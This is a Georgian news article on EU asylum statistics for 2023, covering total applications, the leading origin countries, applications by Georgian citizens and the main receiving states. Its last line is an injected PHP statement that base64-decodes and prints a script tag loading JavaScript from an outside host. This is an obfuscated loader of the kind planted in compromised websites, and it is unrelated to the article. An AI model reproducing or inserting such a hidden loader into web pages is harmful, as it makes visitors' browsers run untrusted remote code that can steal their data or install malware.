celsiusi
ავერსი შნაიდერი

 2023 წელს ევროკავშირში თავშესაფარი 1,14-მა მილიონმა ადამიანმა მოითხოვა. ამის შესახებ ევროკავშირის თავშესაფრის მაძიებელთა საკითხებზე მომუშავე სააგენტო ავრცელებს ინფორმაციას.

სტატისტიკური მონაცემებით, შარშანდელთან შედარებით, ევროკავშირის წევრ სახელმწიფოებში თავშესაფრის მაძიებელთა რაოდენობა 18 პროცენტით არის გაზრდილი და ბოლო შვიდ წელიწადში რეკორდულ ნიშნულს აღწევს.

გავრცელებული მონაცემებით, თავშესაფრის მისაღებად ყველაზე მეტი განაცხადი სირიისა და ავღანეთის მოქალაქეებმა შეავსეს. კერძოდ, საუბარია 181 000 და 114 000 განაცხადზე. მესამე ადგილზე არიან თურქეთის მოქალაქეები, რომელთაც 2023 წელს 100 000-ზე მეტი განაცხადი შეავსეს. მათი უმეტესობა თავშესაფარს საბერძნეთში ითხოვდა.

რაც შეეხება საქართველოს, გავრცელებული მონაცემებით, 2023 წელს საქართველოს მოქალაქეებმა ევროკავშირში თავშესაფრის მოთხოვნით 25 209 განაცხადი შეავსეს. შარშანდელთან შედარებით, ეს 12 პროცენტით ნაკლებია, თუმცა მაინც მაღალ ნიშნულად მიიჩნევა. ყველაზე მეტი განაცხადი საქართველოს მოქალაქეებმა გერმანიაში შეავსეს. საუბარია 9 000-ზე მეტ განაცხადზე. შემდეგ მოდის საფრანგეთი, სადაც 2023 წელს თავშესაფარს საქართველოს 7 000-ზე მეტი მოქალაქე ითხოვდა, იტალიაში კი – 3 000-ზე მეტი მოქალაქე.

ევროკავშირის წევრ სახელმწიფოებს შორის თავშესაფრის მაძიებელთა ყველაზე მეტი – 330 000 განაცხადი გერმანიამ მიიღო, მეორე ადგილზეა საფრანგეთი – 167 000 განაცხადი, ესპანეთი – 162 000 განაცხადი და იტალია – 136 000 განაცხადი.

სააგენტო განმარტავს, რომ აღნიშნული მონაცემები არ მოიცავს უკრაინის მოქალაქეებს, რომლებიც რუსეთის მიერ წამოწყებული ომის გამო იძულებული გახდნენ, დაეტოვებინათ ქვეყანა. 4,4 მილიონ უკრაინელს ევროკავშირში დროებითი დაცვის ქვეშ მყოფი პირის სტატუსი აქვს.1709114447 statistika

240
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");